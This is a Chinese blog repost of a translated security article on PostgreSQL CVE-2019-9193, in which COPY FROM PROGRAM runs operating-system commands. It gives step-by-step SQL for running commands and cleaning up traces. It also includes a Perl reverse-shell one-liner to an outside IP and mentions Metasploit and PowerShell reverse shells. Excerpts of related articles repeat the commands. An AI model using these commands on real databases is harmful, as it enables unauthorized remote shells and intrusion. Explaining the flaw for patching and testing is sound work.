cmd命令卸载sql server_PostgreSQL(从版本9.3至11.2)任意命令执行漏洞(CVE-2019-9193)...

最新推荐文章于 2023-05-08 20:21:32 发布
最新推荐文章于 2023-05-08 20:21:32 发布
阅读量150 收藏
点赞数
文章标签: cmd命令卸载sql server
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32870457/article/details/112479691
版权

0e4a2786dea0a2dea074bdd5feed0671.png

PostgreSQL,俗称Postgres,是世界上最受欢迎的数据库系统之一。它是Mac OSX系统的主力数据库,同时也有Linux和Windows版本。

在这篇文章中,我将展示一个Postgres上鲜为人知的“功能”(CVE-2019-9193),它能使某些数据库用户利用Postgres实现任意代码执行。这个漏洞几乎影响了PostgreSQL的所有版本(从9.3到最新的11.2),同时也影响了所有的操作系统:Windows,Linux和Mac。

从版本9.3开始,Postgres新增了一个“COPY TO/FROM PROGRAM”功能。这个功能简单来说就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。这就意味着数据库的超级用户与运行数据库的用户在操作系统上拥有相同的权限。

ba14976acd65718ac0cbc95d70ba8dfc.png

这种缺乏权限分离的设定,我们早在2000年左右就能看到,例如,Microsoft SQL Server在默认情况下会启用了xp_cmdshell功能。直到Microsoft SQL Server 2005,这种不合理的设定才被修复。但有趣的是,相同的错误似乎一直在不停重复。

14065dcd6b7d8e934ed3d6742594c53e.png


这种错误/缺陷/功能/漏洞介于提权和任意代码执行之间,因为在利用它之前需要数据库的某种身份验证。当然,攻击者也有可能通过SQL注入来实现。无论哪种情况,只有超级用户或具有“pg_read_server_files”权限的用户都才能执行系统命令。

要执行这种攻击,可按照以下步骤操作:

1)[可选]删除你想使用但已存在的表

DROP TABLE IF EXISTS cmd_exec;

2)创建保存系统命令输出的表

CREATE TABLE cmd_exec(cmd_output text);

3)通过COPY FROM PROGRAM功能运行系统命令

COPY cmd_exec FROM PROGRAM 'id';

4)[可选]查看结果

SELECT * FROM cmd_exec;

5)[可选]清理痕迹

DROP TABLE IF EXISTS cmd_exec;

ca6a039fdf254b3db5e3442373a14908.png


注意,原本命令中的任何单引号都必须转换为双引号才能正常生效,例如,如果要运行命令:

echo 'hello';

你需要将它整个放置在单引号内,然后用双引号替换所有内部所有的单引号:

'echo "hello";'

我已在Postgres可运行的所有操作系统上进行了测试,都以反弹回一个shell为目标,这个shell的权限如下:

Windows - NT AUTHORITY/NETWORK SERVICE (低权限)
Linux - postgres (低权限)
Mac - 安装postgres的用户的权限 (通常是管理员权限)

在Linux和Mac OSX系统下通常可以利用perl语言实现反弹shell,命令如下:

COPY files FROM PROGRAM 'perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"';

当然,我还有更简单的方法。我制作了一个新的me tasploit模块(尽快合并到主框架中)来实现远程控制,原本的postgres_payload模块只能在版本8之前生效。我的postgres_cmd_execution_nine_three.rb会自动执行上述所有操作,当然,你必须提供有效的数据库凭据,且具有如上所述权限。如果是SQL注入的情况,那你就只能手动操作了。

d6feaccd18bb6b5b9d986217338702b0.png

51b2578fd11d67b19482d2f8a46b0e91.png

如果目标是Windows系统,NETWORK SERVICE权限的用户似乎不具有写权限,但我们仍然可以利用PowerShell来反弹回shell。我们可以使用me tasploit来生成Powershell编写的反弹shell语句,再带入上述模块中的COMMAND变量。请注意,要使用反斜杠来转义单引号。

aef4cf4d5f0add7b8dd41c8d1b56d880.png

0849d951f7b3882226f3201c88098046.png

66f31b5454ff87eb40349c2111c319e4.png


希望我的研究能对你有用。

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场

来源:PostgreSQL(从版本9.3至11.2)任意命令执行漏洞(CVE-2019-9193)|NOSEC安全讯息平台 - NOSEC.ORG

原文:https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5

白帽汇从事信息安全,专注于安全大数据、企业威胁情报。

公司产品:FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。

为您提供:网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。

丹棱副所长
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
windows完全纯净卸载工具,可解决oracle,pgsql等各种比较麻烦的软件卸载问题
05-25
windows完全纯净卸载工具,可解决oracle,pgsql等各种比较麻烦的软件卸载问题
PostgreSQL 高权限命令执行漏洞CVE-2019-9193)复现
luminous_you的博客
01-05 1712
连接数据库执行命令 DROP TABLE IF EXISTS cmd_exec;//第一次不执行这条 CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'whoami'; SELECT * FROM cmd_exec; 问题:我用的pgadmin连接数据库,在执行这条命令时 COPY cmd_exec FROM PROGRAM 'ipconfig'; 出现了以下错误 ERROR: invalid byte sequen
SQLServer2019-数据删除
m0_67880792的博客
05-08 407
假设表中自动编号为1,2,3,4,5。
drop、truncate和delete的区别
weixin_34409741的博客
03-03 1057
为什么80%的码农都做不了架构师?>>> ...
PostgreSQL高权限命令执行(CVE-2019-9193)漏洞复现&实战
jihaichen的博客
04-26 2712
一、漏洞利用 这个漏洞是一个版本漏洞9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作 系统命令,利用的前提 1、需要登录2、需要高权限 所以要先弱口令爆破之后,然后查看是否是高权限。 这里之所以选择复现这个漏洞,因为其中的思路比较有意思,也就是看回显的思路。 先大体讲一下这个漏洞是怎么看回显的,他是通过命令执行然后把回显写入创建的一张表里面,下面来具体操作。 先删除你
postgresql-9.2.24-7.el7_9.x86_64.rpm
12-19
官方离线安装包,亲测可用。使用rpm -ivh [rpm完整包名] 进行安装
postgresql-devel-9.2.24-7.el7_9.x86_64.rpm
12-19
官方离线安装包,亲测可用。使用rpm -ivh [rpm完整包名] 进行安装
HeidiSQL_11.2.0.6213_64_Portable.rar
09-18
“ Heidi”使您可以从运行数据库系统MariaDB,MySQL,Microsoft SQLPostgreSQLSQLite之一的计算机上查看和编辑数据和结构。 HeidiSQL由Ansgar于2002年发行,属于适用于全球MariaDB和MySQL的最受欢迎的工具。
postgresql-9.3.25-1-windows-x64.exe
最新发布
04-08
这个特定的文件"postgresql-9.3.25-1-windows-x64.exe"是PostgreSQL 9.3.25版本的64位Windows安装程序,它允许用户在Windows操作系统上搭建和管理PostgreSQL数据库服务器。 PostgreSQL 9.3版发布于2013年,包含了...
postgresql-libs-9.2.24-4.el7_8.x86_64.rpm
12-19
官方离线安装包,亲测可用。使用rpm -ivh [rpm完整包名] 进行安装
PostgreSQL:Windows 安装卸载PostgreSQL
热门推荐
OceanStar的博客
12-06 2万+
文章目录1、下载2、安装3、卸载4、PostgreSQL入门命令行登陆psql执行SQL语句创建数据库退出psql连接数据库shop 环境:windows10 64位 1、下载 下载地址:https://www.postgresql.org/download/ 根据需要选择合适的版本 2、安装 右键–》以管理员身份运行: 选择安装路径 选择插件[默认即可] 选择数据的保存路径 设...
CVECVE-2019-9193PostgreSQL 任意命令执行漏洞
边扯边淡
08-01 3511
CVECVE-2019-9193PostgreSQL任意命令执行漏洞
【vulhub】PostGresql高权限命令执行漏洞复现(CVE-2019-9193)
errorr0
08-05 816
CVE-2019-9193
漏洞复现之PostgreSQL任意命令执行CVE-2019-9193)及被勒索回忆
qq_31042199的博客
08-15 1917
为了复现这样一个漏洞需要首先配置目标靶机,整体测试环境如下: 漏洞名称 CVE-2019-9193 漏洞影响PostgreSQL版本 9.3-11.2 漏洞影响平台 windows+Linux+Mac OS 测试硬件环境 win10(家庭版) 虚拟机版本 ubuntu18.04 本次PostgreSQL版本 10.18 win10与ubuntu虚拟机连接方式 桥接 kali攻击机ip 192.168.31.68 靶机ip
漏洞复现之PostgreSQL任意命令执行CVE-2019-9193
Blood_Pupil的博客
05-09 5490
PostgreSQL任意命令执行CVE-2019-9193PostgreSQL是当下最流行的数据库系统之一,它是 Mac OSX系统下常用的数据库,但是同时也提供Windows和Linux操作系统版本 今天,我将要给大家介绍一个PostgreSQL的鲜为人知的特性,这个特性允许数据库的特定用户在PostgreSQL环境中执行任意代码并且在PostgreSQL 9.3至最新版本11.2)...
安装PostgreSQL卸载PostgreSQL
weixin_30430169的博客
11-16 612
安装PostgreSQL sudo apt-get update sudo apt-get install postgresql postgresql-contrib 卸载PostgreSQL sudo apt-get purge 'postgresql-*' sudo apt-get autoremove 'postgresql-*'    转载于:https...
卸载其他版本postgresql
王帅的博客
03-19 1104
废话不多说。一条命令搞定。 我这里卸载的是pg9.5版本。 sudo apt-get purge postgresql-9.5 其他版本卸载方式一样。
通过命令行删除PostgreSQL数据库[关闭]
CHCH998的博客
08-16 1738
I'm trying to drop my database and create a new one through the command line. 我正在尝试删除我的数据库并通过命令行创建一
GIT-SHELL 沙盒绕过(CVE-2017-8386)
黑白的博客
12-23 1045
声明 好好学习,天天向上 漏洞描述 GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 影响范围 复现过程 使用vulhub /app/vulhub-master/git/CVE-2017-8386 使用docker启动 docker-compose build docker-compose up -d 先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compose文件一起的文件夹内,拷贝到kali中,执行下述命令 ch
postgresql-libs-9.2.24-7.el7_9.x86_64 linux安装
05-16
postgresql-libs-9.2.24-7.el7_9.x86_64是PostgreSQL的一个库文件,用于安装和运行PostgreSQL数据库。运行PostgreSQL需要先安装PostgreSQL的核心数据库和相关库文件,然后再安装postgresql-libs库文件。 要安装...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值